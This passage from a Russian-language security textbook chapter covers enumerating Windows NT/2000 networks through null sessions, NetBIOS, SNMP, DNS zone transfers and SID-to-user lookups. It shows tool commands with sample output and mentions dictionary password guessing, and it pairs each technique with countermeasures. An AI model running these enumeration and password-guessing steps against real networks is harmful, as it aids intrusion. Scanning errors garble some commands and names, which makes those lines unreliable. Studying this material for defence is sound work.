    В системе Win 2000 используется еще порт 8MB с номером 445, который позволяет получить аналогичную информацию. Более подробные сведения и описание методов защиты содержатся в главе 6.

    Начиная с третьего сервисного пакета системы NT компания Microsoft предложила механизм, позволяющий предотвратить опасность извлечения важной информации с помощью нулевых соединений без отключения режима использования протокола NetBIOS поверх TCP/IP (хотя мы по-прежнему рекомендуем сделать это, если в службах NetBIOS нет необходимости). Этот механизм был назван RestrictAnonymous — по названию соответствующего параметра системного реестра. Для его использования выполните следующие действия.
    1. Запустите regedt32 и перейдите в каталог HKEY_LOCAL_MACHlNE\SYSTEM\Current ControlSet\Control\LSA.
    2. Выберите команду Edit>Add Value и введите следующие данные. Имя параметра: RestrictAnonymous Тип данных: REG_DWORD Значение: 1 (или 2 для Win 2000)
    3. Закройте редактор системного реестра и перезапустите компьютер, чтобы внесенные изменения вступили в силу.
    В системе Windows 2000 реализовать подобную защиту несколько проще, поскольку в консоли управления имеется модуль Security Settings с элементом \Local Policies\Security Options. С помощью графического интерфейса консоли управления можно выполнить настройку многих параметров системного реестра, связанных с обеспечением защиты. В системе NT4 все подобные изменения необходимо выполнять вручную. Что еще лучше, параметры, подобные RestrictAnonymous, можно применить к организационной единице (Organizational Unit - OU), узлу или на уровне домена. Если все изменения производились на контроллере домена Win 2000, то эти параметры будут унаследованы всеми дочерними объектами активного каталога. При этом потребуется воспользоваться модулем Group Policy, который более подробно будет рассматриваться в главе 6.
    Для того чтобы ограничить доступ к данным NetBIOS неавторизованных пользователей с помощью элементов Group Policy/Security Options, установите режим No access without explicit anonymous permissions для параметра Additional restrictions for anonymous connections. (Это аналогично заданию значения 2 для параметра RestrictAnonymous системного реестра Win 2000.)
    Примечательно, что установка этого параметра на самом деле не блокирует самого анонимного соединения. Единственное, что она делает, — предотвращает утечку информации через такое соединение главным образом данных об учетных записях и совместно используемых ресурсах. В Windows 2000 параметр RestrictAnonymous имеет значение 2. Оно позволяет ограничить доступ к ресурсам лишь посредством нулевых сеансов с явно заданными разрешениями (см. рис. выше).


    Одним из самых примечательных исключений из этого правила является утилита sid2user (описываемая в разделе "Инвентаризация Пользователей И Групп NT/2000"), которая продолжает функционировать даже при включенном режиме RestrictAnonymous.

    Более подробную информацию можно найти в статье Q143474 системы Knowledge Base компании Microsoft по адресу http://search.support.microsoft.com. Для получения более подробного технического описания можно обратиться к статье о хакинге служб NetBIOS CIFS: Common insecurities Fail Scrutiny Хобита, которую можно найти по адресу http://www.avian.org или в документах RFC 1001 и 1002, где содержится спецификация передачи данных по протоколам NetBIOS и TCP/UDP.
    Мы вкратце обосновали важность информации, которую можно получить с помощью нулевых соединений. В подавляющем большинстве случае такие данные нельзя оставлять незащищенными, особенно если сервер подключен к Internet. Мы настоятельно рекомендуем установить параметр RestrictAnonymous.
    После постановки задачи в целом самое время перейти к изучению средств и приемов, которые при этом могут использоваться.


    1.gif

    Изображение: 

    3. Инвентаризация сетевых ресурсов NT/2000



    Инвентаризация сетевых ресурсов NT/2000


    Первое, что может попробовать осуществить удаленный взломщик после скрупулезного изучения сети, — это получить представление об имеющихся в ней ресурсах. Сначала мы рассмотрим инвентаризацию ресурсов NetBIOS, а затем перейдем к инвентаризации служб TCP/IP, которые в большинстве случаев функционируют в системах NT/2000.

    Инвентаризация NetBIOS



    Средства и приемы, которые можно применять к изучению ресурсов сети с протоколом NetBIOS, можно найти без труда — большинство из них встроено в саму операционную систему! Именно с них мы и начнем. Затем вы познакомитесь с некоторыми утилитами сторонних производителей. Возможные контрмеры лучше рассматривать в самом конце обсуждения, поскольку одновременно решить все проблемы гораздо проще.

    Инвентаризация доменов NT/2000 с помощью команды net view



    В качестве одного из самых ярких примеров встроенных инструментов можно привести команду net view. Это чрезвычайно простая утилита командной строки систем NT/2000, которая позволяет просмотреть все домены сети, а также практически все компьютеры доменов. Вот как выполнить инвентаризацию доменов в сети с использованием команды net view:

    C:\>net view /domain
    Domain
    ---------------------------------------------
    CORLEONE BARZINI_DOMAIN TATAGGLIA_DOMAIN BRAZZI
    The command completed successfully.

    С помощью следующей команды будут перечислены все компьютеры определенного домена.

    C:\>net view /domain:corleone
    Server Name Remark
    \\VITO ' Make him an offer he can't refuse
    \\MICHAEL Nothing personal
    \\SONNY Badda bing badda boom
    \\FREDO I'm smart
    \\CONNIE Don't forget the cannoli

    He забывайте о том, что можно использовать информацию, полученную с помощью ping-прослушивания (глава 2), и подставить IP-адреса вместо имен NetBIOS отдельных компьютеров. Обычно IP-адреса и имена NetBIOS взаимозаменяемы (например, \\192.168.202.5 эквивалентно \\SERVER_NAME). Для удобства взломщики зачастую добавляют соответствующие записи с ключевым словом #PRE В свой файл %systemroot%\system32\drivers\etc\LMHOSTS, а затем запускают в командной строке команду nbtstat -R, чтобы перезагрузить буфер таблицы имен. С этого момента при атаке можно без проблем использовать имя NetBIOS, которое автоматически будет преобразовываться в соответствующий IP-адрес, заданный в файле LMHOSTS.

    Получение дампа таблицы имен NetBIOS с помощью команд nbtstat и nbtscan



    Другой мощной встроенной утилитой является nbtstat, которая позволяет получить таблицу имен NetBIOS удаленной системы. Как видно из следующего примера, в этой таблице содержится важная информация.

    C:\>nbtstat -A 192.168.202.33
    NetBIOS Remote Machine Name Table
    Name Type Status
    SERVR9 <00> UNIQUE Registered
    SERVR9 <20> UNIQUE Registered
    9DOMAN <00> GROUP Registered
    9DOMAN <1E> GROUP Registered
    SERVR9 <03> UNIQUE Registered
    INet-Services <1C> GROUP Registered
    IS-SERVR9......<00> UNIQUE Registered
    9DOMAN <1D> UNIQUE Registered
    .._MSBROWSE_.<01> GROUP Registered
    ADMINISTRATOR <03> UNIQUE Registered
    MAC Address = 00-AO-CC-57-8C-8A

    Фрагмент листинга указывает, что с помощью команды nbtstat было получено имя компьютера (SERVR9), домен, в котором он расположен (9DOMAIN), имена зарегистрированных пользователей (ADMINISTRATOR), все запущенные службы (inet-Services) и МАС-адрес. Всю эту информацию можно узнать по кодам службы NetBIOS (числа из двух цифр, расположенные справа от имени), частично представленным в табл. 3.1.

    Таблица 3. 1. Стандартные коды служб NetBIOS

    Код NetBIOS
    Ресурс
    <имя компьютера>[00]
    Служба рабочей станции
    <имя домена>[00]
    Имя домена
    <имя компьютера>[03]
    Служба рассылки (для сообщений, переданных на данный компьютер)
    <имя пользователя>[03]
    Служба рассылки (для сообщений, переданных данному пользователю)
    <имя компьютера>[20]
    Служба сервера
    <имя домена>[10]
    Главный броузер (master browser)
    <имя домена>[1Е]
    Служба просмотра (browser service elections)
    <имя домена>[1В]
    Главный броузер домена (domain master browser)

    Двумя основными недостатками команды nbtstat являются возможность ее применения к одному узлу одновременно и несколько непонятные выходные данные. Обоих этих недостатков лишена свободно распространяемая утилита nbtscan Аллы Безручко (Alia Bezroutchko), которую можно найти по адресу http://www.abb.aha. ru/software/nbtscan.html. Эта утилита позволяет быстро выполнить те же действия, что и команда nbtstat, над всей сетью и при этом предоставляет прекрасно отформатированные результаты.

    D:\Toolbox\nbtscanl02>
    nbtscan 192.168.234.0/24
    Doing NBT name scan for adresses from
    192.168.234.0/24
    IP address NetBIOS Name Server User MAC address
    192.168.234.36 WORKSTN12 <server> RSMITH 00-00-86-16-47-d6
    192.168.234.110 CORP-DC <server> CORP-DC 00-cO-4f-86-80-05
    192.168.234.112 WORKSTN15 <server> ADMIN 00-80-c7-0f-a5-6d
    192.168.234.200 SERVR9 <server> ADMIN 00-aO-cc-57-8c-8a

    Утилита nbtscan позволяет быстро получить данные об узлах сети, на которых используется система Windows. Попробуйте запустить ее для сети класса С из Internet, и вы поймете, что именно мы хотели сказать.

    Инвентаризация контроллеров доменов



    Для того чтобы проникнуть в структуру сети Windows NT немного глубже, понадобится инструмент, входящий в комплект NTRK. В следующем примере мы увидим, как с помощью средства NTRK nltest можно узнать, какие контроллеры доменов являются первичными (РОС — Primary Domain Controller), а какие — вторичными (ВDC — Backup Domain Controller).

    C:\> nltest /dclist:corleone
    List of DCs in Domain corleone
    \\VITO (PDC)
    \\MICHAEL
    \\SONNY
    The command completed successfully

    Для дальнейшего продвижения вперед нам необходимо воспользоваться нулевым соединением. (Помните о нем? Если нет, то вернитесь к началу данной главы.) Достаточно установить нулевой сеанс с одним из узлов представляющего интерес домена, чтобы затем с помощью команды вида nltest /server :<имя_сервера>, а также параметра /trusted_ domains узнать всю информацию о доменах NT, в которые входит данный компьютер.

    Инвентаризация совместно используемых ресурсов NetBIOS с помощью команды net view и утилит NTRK



    Установив нулевой сеанс, можно снова взяться за старую добрую команду net view и провести инвентаризацию ресурсов удаленной системы, предоставленных для совместного доступа:

    C:\>net view \\vito
    Shared resources at \\192.168.7.45
    VITO
    Share name Type Used as Comment
    NETLOGON Disk Logon server share
    Test Disk Public access
    The command completed successfully.

    В состав комплекта NTRK входят три утилиты, которые могут оказаться полезными для инвентаризации совместно используемых ресурсов, — rmtshare, srvcheck и srvinfo (с параметром -s). Утилита rmtshare выводит результат примерно в том же виде, что и команда net view. Утилита srvcheck отображает сведения о совместно используемых ресурсах и авторизованных пользователях, включая скрытые ресурсы. Однако для этого необходимо получить доступ к удаленной системе в качестве привилегированного пользователя. Наконец, утилита srvinfo с параметром -s позволяет просмотреть перечень совместно используемых ресурсов, а также получить об исследуемой системе множество другой полезной информации.

    Инвентаризация совместно используемых ресурсов NetBIOS с помощью утилиты DumpSec (ранее DumpACL)



    Одним из лучших инструментов для инвентаризации совместно используемых ресурсов NT (причем этим возможности .не ограничиваются), является пакет DumpSec (ранее DumpACL), основное диалоговое окно которого показано на рис. 3.1. Он распространяется бесплатно компанией Somarsoft (http://www.somarsoft.com). Вряд ли можно найти другой инструмент, который заслуживал бы такого же внимания администратора NT. Программа DumpSec выполняет чрезвычайно широкий аудит, начиная от разрешений на использование файловой системы удаленного узла и заканчивая перечнем запущенных на ней служб. На рис. 3.1 показан пример работы программы DumpSec для получения информации о совместно используемых ресурсах удаленной системы. Основная информация о пользователях может быть получена даже через нулевое соединение. Кроме того, эту программу можно запускать из командной строки, что позволяет без особых проблем применять ее при автоматизации процесса сбора и обработки информации, а также при написании сценариев.



    Рис. 3.1. Путем установки нулевого соединения с исследуемым компьютером программа DumpSec предоставляет перечень совместно используемых ресурсов

    Поиск совместно используемых ресурсов с помощью утилит Legion и NAT



    Открытие нулевого сеанса и использование описанных выше инструментов в ручном режиме прекрасно подходят для прямого вторжения, однако большинство хакеров предпочитают использовать сканер NetBIOS, чтобы быстро проверить целую сеть на предмет наличия незащищенных ресурсов. Одной из наиболее популярных утилит является Legion (ее можно найти во многих архивах Internet), диалоговое окно которой показано на следующем рисунке.


    Утилита Legion может обследовать сеть класса С и представить в своем окне перечень всех обнаруженных совместно используемых ресурсов. Ее версия 2.1 поддерживает режим подбора пароля "в лоб", при использовании которого утилита пытается подключиться к определенному ресурсу с помощью предоставленного пользователем списка паролей. Более подробная информация о подборе паролей Windows 9x и Windows NT приведена в главах 4 и 5 соответственно.



    Рис. 3.2. Две версии утилиты NAT— с графическим интерфейсом и для использования в командной строке

    Еще одним популярным сканером совместно используемых ресурсов Windows является утилита NetBIOS Auditing Tool (NAT), работа которой основывается на коде, написанном Эндрю Тридгеллем (Andrew Tridgell). Эту утилиту можно найти на Web-узле книги по адресу http://www.hacking exposed.com. Участники ныне уже не существующей группы Rhino9 Security Team Неон Сурж (Neon Surge) и Хамелеон (Chameleon) написали графический интерфейс для утилиты NAT (рис. 3.2). Утилита NAT не только находит совместно используемые ресурсы, но и пытается подключится к ним с помощью списков пользовательских имен и паролей.

    Другие средства инвентаризации сети NT/2000



    Необходимо упомянуть еще несколько программ, предназначенных для инвентаризации ресурсов NT: epdump компании Microsoft (ее можно найти по адресу http: //www.ntshop.net/security/tools/def.htm), getmac и netdom (из комплекта NTRK), а также утилиту netviewx Джеспера Лорицена (Jesper Lauritsen) http://www.ibt.ku.dk/jesper/NTtools). Утилита epdump посредством обращения :< интерфейсу RPC отображает перечень служб, связанных с IP-адресами и номерами портов (при этом результаты отображаются далеко не лучшим образом). Утилита getmac, используя нулевой сеанс, отображает МАС-адреса и имена устройств, присвоенных сетевым адаптерам удаленных узлов. Эта информация имеет особый интерес только для хакера, который ищет систему с несколькими сетевыми адаптерами. Утилита netdom более полезна, поскольку она выдает информацию обо всех связанных доменах, включая сведения о принадлежности к домену и его резервных контроллерах. Утилита netviewx также является мощным инструментом, позволяющим получить информацию об узлах домена и запущенных на них службах. Мы часто используем netviewx для проверки наличия службы удаленного доступа NT (RAS— Remote Access Service), чтобы получить представление о количестве серверов в сети, обеспечивающих удаленный доступ. Для этого можно воспользоваться представленной ниже командой. С помощью параметра -T задается имя исследуемого домена, а параметр -т позволяет задать тип компьютера или службы.

    C:\>netviewx -D CORLEONE -Т dialin_server
    VITO,4,0,500,nt%workstation%server%
    domain_ctrl%time_source%dialin_server%
    backup_browser%master_browser,"
    Make him an offer he can't refuse "

    Имена служб, запущенных на этом сервере, представлены между символами %. Кроме того, утилита netviewx является хорошим средством для поиска компьютера, который не является контроллером домена. Это не лишено смысла, поскольку вероятность того, что такой компьютер не будет иметь надежной защиты гораздо выше, чем у контроллера домена.
    Утилита Winfo Арни Видстрома (Arne Vidstrom), которую можно найти по адресу http://www.ntsecurity.nu, позволяет извлечь с удаленного компьютера информацию об учетных записях пользователей, совместно используемых ресурсах, а также данные об установленных доверительных отношениях. Эта утилита позволяет даже автоматически открыть нулевой сеанс, если при ее запуске указан параметр -n.
    Программа nbtdump Дэвида Литчфилда (David Litchfield) (http://www.cerberus-infosec.uk/toolsn.shtml) позволяет использовать нулевые сеансы, выполнять поиск данных о совместно используемых ресурсах и пользовательских учетных записях, а, кроме того, полученные результаты представляет в прекрасном отчете HTML.

    Универсальное средство инвентаризации: утилита еnum



    Эта утилита была разработана группой Razor компании Bindview. В ней реализованы возможности всех других средств инвентаризации NetBIOS. Разработчики назвали эту программу enum, и это очень подходит для данной главы. Утилиту enum можно найти по адресу http://razor.bind-view.com. В приведенном ниже листинге представлены возможные Параметры командной строки. Из листинга видно, насколько всесторонние возможности предоставляет эта утилита.

    D:\Toolbox>enum
    использование: enum [параметры] [имя_узла|IP-адрес]
    -U: получить список пользователей
    -М: получить список узлов
    -N: получить дамп имен (в отличие от -U|-M)
    -S: получить список совместно используемых ресурсов
    -Р: получить данные о принятой политике шифрования паролями
    -G: получить список групп и их членов
    -L: получить данные о политике LSA
    -D: взлом с использованием словаря, требуется -и и -f
    -d: с детализацией, применяется к -U и -S
    -с: не прерывать сеанс
    -и: задает имя пользователя (по умолчанию "")
    -р: задает пароль (по умолчанию "")
    -f: задает файл словаря (для -D)

    Утилита enum позволяет автоматически устанавливать и завершать нулевой сеанс. Отдельного упоминания заслуживает параметр -Р, предоставляющий информацию о принятой политике шифрования паролями. С его помощью взломщики могут оценить возможность удаленного определения пользовательских паролей (с помощью параметров -о, -и и -£) до того момента, как будет найден наиболее легкий из них. Более подробно утилита еnum будет рассматриваться в следующем разделе, посвященном инвентаризации учетных записей пользователей NT/2000.

    Инвентаризация NetBIOS: контрмеры



    Практически во всех рассмотренных выше приемах задействуется механизм передачи данных NetBIOS, так что при запрещении доступа к портам TCP и UDP с 135 до 139 все попытки получения информации окажутся неудачными. Для этого лучше всего заблокировать доступ к этим портам с использованием маршрутизатора, брандмауэра или любого другого устройства управления доступом. В разделе, посвященном нулевым сеансам, вы узнали, как запретить использование протокола NetBIOS поверх TCP/IP и нужным образом настроить параметр системного реестра RestrictAnonymous. Это позволит предотвратить опасность извлечения важных данных посредством установки анонимных соединений. Однако правильное конфигурирование параметра RestrictAnonymous не способно заблокировать запросы, сгенерированные с использованием команд net view и nbtstat. Кроме того, не забывайте о том, что в системе Win 2000 некоторую информацию можно получить и через порт TCP/UDP с номером 445, так что доступ к этом порту также целесообразно заблокировать.

     Инвентаризация SNMP NT/2000



    Даже если вы сделали все, чтобы предотвратить доступ к службам NetBIOS, с компьютера NT/2000 по-прежнему можно получить аналогичную информацию, если на нем запушен агент SNMP (Simple Network Management Protocol). Доступ к этому агенту можно получить с помощью строки доступа public, используемой по умолчанию. В таких случаях инвентаризация пользователей NT через протокол SNMP с помощью программы sranputil из комплекта NTRK превращается в увеселительную прогулку как в прямом (от английского слова walk ("пройтись"), фигурирующего в качестве параметра), так и в переносном смысле.

    С:\>snmputil walk 192.168.202.33
    public .1.3.6.1.4.1.77.1.2.25

    Variable = .iso.org.dod.
    internet.private.enterprises.lanmanager.
    lanmgr-2.server.svUserTable.
    svUserEntry.svUserName.5.
    71.117.101.115.116 Value = OCTET STRING - Guest
    Variable = .iso.org.dod.internet.
    private.enterprises.lanmanager.
    lanmgr-2.server. svUserTable.svUserEntry.svUserName.13.
    65.100.109.105.110.105.115.116.114.97.116.111.114
    Value=OCTET STRING - Administrator
    End of MIB subtree.

    В приведенном выше примере запуска утилиты snmputil последний параметр (.1.3.6.1.4.1.77.1.2.25)— это идентификатор объекта (OID — Object Identifier), который в соответствии с требованиями протокола SNMP определяет ветвь информационной управляющей базы (MIB — Management Information Base) компании Microsoft. База MIB — это иерархическое пространство имен, поэтому "прогулка" по всему дереву (т.е. использование менее точного значения, например .1.3.6.1.4.1.77) приведет к получению слишком больших объемов информации. Запомнить все номера довольно сложно, поэтому взломщик, скорее всего, ограничится их строковыми эквивалентами. Ниже перечислены некоторые сегменты MIB, с помощью которых можно получить соответствующую информацию (для этого необходимо добавить тот или иной сегмент к .iso.оrg.dod.internet.private.enterprises.lanmanager.lanmgr-2).

    Сегмент MIB
    Выводимая информация
    .server. svSvcTable.
    svSvcEntry.svSvcName

    Запушенные службы
    .server.svShareTable.
    svShareEntry.svShareName

    Имена совместно используемых ресурсов
    . erver.svShareTable.
    svShareEntry.svSharePath

    Путь к совместно используемым ресурсам
    .server.svShareTable.
    svShareEntry.svShareComment

    Комментарии к совместно используемым ресурсам
    .server.svUserTable.
    svUserEntry.svUserName

    Имена пользователей
    .domain.domPrimaryDomain
    Имя домена

    Конечно, можно избавиться от рутинной работы по вводу столь длинных параметров. Для этого достаточно найти в Internet (например, по адресу http: //www.solar winds.net) прекрасный SNMP-броузер с именем IP Network Browser, предоставляющий всю перечисленную выше информацию в наглядной форме. На рис. 3.3 показано, как программа IP Network Browser проверяет сеть на наличие в ней компьютеров, на которых используется протокол SNMP.



    Рис. 3.3. Утилита IP Network Browser компании Solar Winds позволяет получить подробную информацию о компьютере, на котором запущен агент SNMP. Для этого достаточно правильно указать строку доступа (community string). Б данном примере показана система, использующая заданную по умолчанию строку доступа public

    Контрмеры: защита протокола SNMP



    Самый простой способ предупреждения такой деятельности состоит в удалении агента SNMP или в отключении службы SNMP с помощью аплета Services панели управления. Если данный вариант вам не подходит, то как минимум убедитесь в том, что доступ к данной службе правильно настроен и используется строка доступа private, а не установленная по умолчанию строка public. Можно также отредактировать системный реестр, чтобы разрешить только санкционированный доступ к службе SNMP и запретить передачу информации NetBIOS о системе. Для этого запустите программу regedt32 и найдите параметр HKLM\ SystemNCurrentControlSet\Services\ SNMP\Paramaters\ValidConununities. Выберите команду Permissions>Security и установите в открывшемся диалоговом окне значение таким образом, чтобы разрешить доступ только аутентифицированным пользователям системы. Затем перейдите к разделу HKLM\System\CurrentControlSet\ Services\SNMP\ ParametersNExtensionAgents, удалите значение, содержащее строку LANManagerMIB2Agent, а затем переименуйте остальные параметры, чтобы восстановить правильную последовательность. Например, если вы удалили параметр с номером 1, переименуйте параметры 2, 3, 4 и т.д. в 1, 2, 3 и т.д.
    Кроме того, если вы используете протокол SNMP для управления сетью, заблокируйте доступ к портам TCP и LJDP с номерами 161 и 162 (SNMP GET/SET) по всему периметру граничных устройств управления доступом. Как мы еще неоднократно увидим в этой и последующих главах, разрешение передачи внутреннего потока SNMP за пределы сети — это очень серьезная угроза безопасности. Более подробная информация о протоколе SNMP приводится в соответствующих документах RFC, которые можно найти по адресу http://www.rfc-editor.org.

    Перенос зоны DNS Win 2000



    Как было показано в главе 1, одной из основных целей предварительного сбора информации является получение данных о системе доменных имен (DNS), используемой в Internet, и преобразование IP-адресов узлов в дружественные имена, такие как amazon.com. Поскольку пространство имен активного каталога основывается на использовании службы DNS, компания Microsoft полностью обновила реализацию сервера DNS в Win 2000, чтобы удовлетворить всем новым потребностям.
    Для обеспечения клиентам возможности поиска служб домена Wind 2000, например служб активного каталога и Kerberos, в Win 2000 имеется запись DNS SRV (RFC 2052), позволяющая определить местонахождение сервера по типу службы (например, LDAP, FTP или WWW) и протоколу (например, TCP/IP). Таким образом, при выполнении простого переноса зоны (nslookup, Is -d <имя-домвна>) можно получить самую разную информацию, как показано в следующем примере, в котором осуществляется перенос зоны домена labf arce. org. (Для краткости и повышения читабельности листинг был отредактирован.)

    D:\Toolbox>nslookup
    Default Server: corp-dc.labfarce.org
    Address: 192.168.234.110
    > Is -d labfarce.org
    [[192.168.234.110]]
    labfarce.org. SOA corp-dc.
    labfarce,org admin.
    labfarce.org. A 192.168.234.110
    labfarce.org. NS corp-dc.labfarce.org
    _gc._tcp SRV priority=0, weight=100, port=3268,
    corp-dc. labfarce.org
    _kerberos._tcp SRV priority=0, weight=100, port=88,
    corp-dc. labfarce.org
    _kpasswd._tcp SRV priority=0, weight=100, port=464,
    corp-dc. labfarce.org
    _ldap._tcp SRV priority=0, weight=100, port=389,
    corp-dc. labfarce.org

    Согласно спецификации RFC 2052, запись SRV имеет следующий формат.
    Service.Proto.Name TTL Class SRV Priority Weight Port Target
    Из этой информации взломщик может получить некоторые сведения, а именно местоположение доменной службы глобального каталога (Global Catalog) (_gc._tcp), контроллеров домена, на которых используется аутентификация по протоколу Kerberos (_kerberos._tcp), серверов LDAP (_ldap._tcp), а также связанные с ними номера портов (в данном случае представлены лишь порты TCP).

    Блокирование переноса зоны DNS Win 2000



    К счастью, в системе Win 2000 служба DNS реализована таким образом, что можно без проблем ограничить перенос зоны, как показано ниже на рисунке. На нем представлено диалоговое окно свойств зоны поиска в прямом направлении (в данном случае для сервера labf arce. org). Для того чтобы открыть это окно, запустите консоль управления Computer Management и откройте элемент Server Applications and Services\DNS\<имя_cepверa>\Forward Lookup Zones\[имя_зоны], а затем выберите команду Properties.


    Нетрудно догадаться, что по умолчанию в системе Windows 2000 разрешен перенос зоны по любому запросу. Можно полностью запретить перенос зоны, просто сбросив флажок Allow zone transfers, однако более реалистично было бы предположить, что на резервных серверах DNS информация должна регулярно обновляться. Так что в диалоговом окне свойств зоны можно установить и менее ограничивающий режим.


    2.gif

    Изображение: 

    3.gif

    Изображение: 

    4.gif

    Изображение: 

    5.gif

    Изображение: 

    6.gif

    Изображение: 

    4. Инвентаризация пользователей и групп NT/2000



    Инвентаризация пользователей и групп NT/2000


    Знать имена компьютеров и совместно используемых ресурсов совсем неплохо, однако настоящим праздником для хакера является получение имен пользователей. С того момента, как получено такое имя, можно считать, что 50% работы по взлому учетной записи выполнено. Некоторые специалисты считают, что на самом деле после получения имени пользователя остается затратить гораздо меньше усилий, поскольку распространенной практикой является использование простых паролей (и, вообще говоря, имен учетных записей!).
    Мы снова попробуем открыть нулевой сеанс (который уже упоминался в этой главе) для получения начального доступа и попробуем воспользоваться различными приемами инвентаризации. Кроме того, вы узнаете, как извлечь информацию о пользователях с использованием службы SNMP и службы активного каталога Windows 2000.

    Инвентаризация пользователей через протокол NetBIOS



    К сожалению, неправильно сконфигурированные компьютеры NT/2000 предоставляют информацию о пользователях с такой же готовностью, как и о совместно используемых ресурсах. Это неоднократно демонстрировалось при рассмотрении приемов инвентаризации NetBIOS. В данном разделе вы еще раз столкнетесь с уже известными и познакомитесь с новыми средствами, которые очень хорошо подходят для получения информации о пользователях.
    Ранее уже рассматривались возможности встроенной в операционную систему утилиты nbtstat и ее дополнения — свободно распространяемой программы nbtscan. Обе утилиты позволяют получить дамп удаленной таблицы имен NetBIOS, и, что очень важно, при этом не требуется открывать нулевой сеанс. Так что имена пользователей будут получены независимо от того, правильно ли установлено значение параметра RestrictAnonymous системного реестра.
    Утилита еnum группы разработчиков Razor (которая уже упоминалась выше) автоматически устанавливает нулевое соединение и извлекает всю наиболее ценную информацию, о которой только может мечтать взломщик. Следующий пример, демонстрирующий всю опасность подобных действий, для краткости был отредактирован.

    D:\Toolbox>enum -U -d -Р -L -с 172.16.41.10
    server: 172.16.41.10
    setting up session... success,
    password policy: rain length: none
    lockout threshold: none
    opening Isa policy... success. names:
    netbics: LABFARCE.COM
    domain: LA3FARCE.COM
    trusted domains:
    SYSOPS
    PDC: CORP-DC
    netlogon done by a PDC server
    getting user list {pass 1, index 0)... success, got 11.
    Administrator (Built-in account for administering
    the computer/domain)
    attributes:
    chris attributes:
    Guest (Built-in account for guest access to the computer/domain)
    attributes: disabled
    keith attributes: Michelle attributes:

    Утилита enum позволяет также определить удаленный пароль одного пользователя за один раз с использованием параметров-о -и <имя-пользователя> -f <файл-словаря>.
    В комплекте NTRK имеется еще несколько инструментов, с помощью которых можно получить более подробную информацию о пользователях (через нулевой сеанс или другими способами). К таким утилитам относятся usrstat, showgrps, local и global. Однако наиболее мощным средством получения информации о пользователях является утилита DumpSec. Она позволяет получить список пользователей, групп, используемых системных политиках и правах пользователей NT. В следующем примере утилита DumpSec используется в командной строке для получения файла с информацией о пользователях удаленного компьютера (не забывайте о том, что эта утилита требует открытия нулевого сеанса).

    C:\>dumpsec /computer=\\192.168.202.33 /rpt=usersonly
    /saveas=tsv /outfile=c:\temp\users.txt

    C:\>cat c:\temp\users.txt
    4/3/99 8:15 PM - Somarsoft DumpSec - \\192.168.202.33
    UserName FullName Comment
    barzini Enrico Barzini Rival mob chieftain
    godfather Vito Corleone Capo
    godzilla Administrator Built-in account for administering the
    domain
    Guest Built-in account for guest access
    lucca Lucca Brazzi Hit man
    mike Michael Corleone Son of Godfather

    При использовании графического интерфейса утилиты DumpSec можно получить отчет с гораздо большим количеством полей, однако даже формат приведенного выше примера обычно позволяет выявить нарушителя. Например, однажды мы натолкнулись на сервер, на котором пароль для переименованной учетной записи администратора хранился в поле FullName. При задании правильного значения параметра RestrictAnonymous все попытки извлечения такой информации с помощью утилиты DumpSec будут блокироваться.

    Идентификация учетных записей с помощью утилит user2sid/sid2user



    Двумя другими чрезвычайно мощными средствами инвентаризации NT/2000 являются утилиты sid2user и user2sid, написанные Евгением Рудным (Evgenii Rudnyi). Эти утилиты командной строки позволяют получить идентификатор защиты пользователя (SID — Security ID) no его идентификатору и наоборот. SID — это числовое значение переменной длины, назначаемое системой NT во время установки. Хорошее описание структуры и функций SID приведено в статье Марка Русиновича (Mark Russinovich). После получения с помощью утилиты user2sid идентификатора SID домена взломщик может использовать его для извлечения соответствующих имен пользователей. Например

    C:\>user2sid \\
    192.168.202.33 "domain users"

    S-l-5-21-8915387-1645822062-1819828000-513
    Number of subauthorities is 5
    Domain is WINDOWSNT
    Length of SID in memory is 28 bytes
    Type of SID is SidTypeGroup

    Таким образом, мы получили SID компьютера, представляющий собой строку, начинающуюся с S-1 и нескольких чисел, разделенных дефисами. Последнее число последовательности называется относительным идентификатором (RID — Relative ID), значение которого для встроенных групп и пользователей Windows NT/2000, таких как Administrator или Guest, определено по умолчанию. Например, RID пользователя Administrator всегда равен 500, а пользователя Guest — 501. Вооружившись этой информацией, хакер может с помощью утилиты sid2user и RID 500, добавленного к SID, узнать имя пользователя, являющегося администратором, даже если учетная запись Administrator была переименована.

    C:\>sid2user \\192.168.2.33 5 21
    8915387 1645822062 18198280005 500

    Name is godzilla
    Domain is WINDOWSNT
    Type of SID is SidTypeUser

    Обратите внимание, что префикс S-1 и дефисы опущены. Еше одним интересным фактом является то, что первой учетной записи, созданной в любой локальной системе или домене NT/2000, присваивается RID 1000, а каждому последующему объекту — следующий номер (1001, 1002, 1003 и т.д.), причем при удалении объекта его номер уже никогда не используется при создании новых объектов. Таким образом, узнав лишь SID, хакер может получить сведения практически обо всех пользователях и группах системы, работающей под управлением Windows NT/2000, как в прошлом, так и в настоящем. Самое важное, что утилиты sid2user и user2sid работают даже в тех случаях, когда включен режим RestrictAnonumous (см. выше) — лишь бы только был открыт порт 139. Есть над чем подумать, не так ли?

    Пример сценария, который можно использовать для применения утилит sid2user/user2sid, содержится ниже в разделе "Позвольте Сценариям Выполнить Всю Работу".


    Инвентаризация пользователей через протокол NetBIOS: контрмеры



    Хотя меры защиты против рассмотренных выше приемов инвентаризации уже рассматривались, не лишним будет упомянуть о них еще раз.
    Для блокировки запросов к таблице имен NetBIOS с помощью таких утилит, как nbtstat и nbtscan, лучше всего запретить доступ к TCP- и UDP-портам с номерами 135-139 и 445. В противном случае данные о пользователям можно защитить лишь одним способом — запретив использование служб Alerter и Messenger на отдельных узлах. Способ запуска этих служб при загрузке компьютера можно задать с помощью аплета Services панели управления.
    Зашита данных, которые можно получить путем открытия нулевого сеанса с использованием утилиты DumpSec, может быть обеспечена при установке соответствующего значения (типа REG_DWORD, 1 для NT4 и 2 для Win 2000) для параметра RestrictAnonymous системного реестра. Его можно найти в поддереве HKLM\SYSTEM\CurrentControlSet\ Control\LSA.
    Предотвратить попытки извлечения данных с помощью утилит sid2user/user2sid можно лишь одним способом, а именно запретив доступ к портам 139 и 445.

    Инвентаризация пользовательских учетных записей с помощью протокола SNMP



    Не забывайте о том, что компьютеры под управлением системы Windows, на которых запущен агент SNMP, будут предостаапять информацию об учетных записях таким средствам, как, например, утилита IP Network Browser от компании Solar Winds (см. рис. 3.3 выше в данной главе). Более подробные сведения о мерах защиты против инвентаризации SN М Р содержатся в предыдущем разделе.

    Инвентаризация службы активного каталога .'#." Win 2000 с помощью утилиты ldp



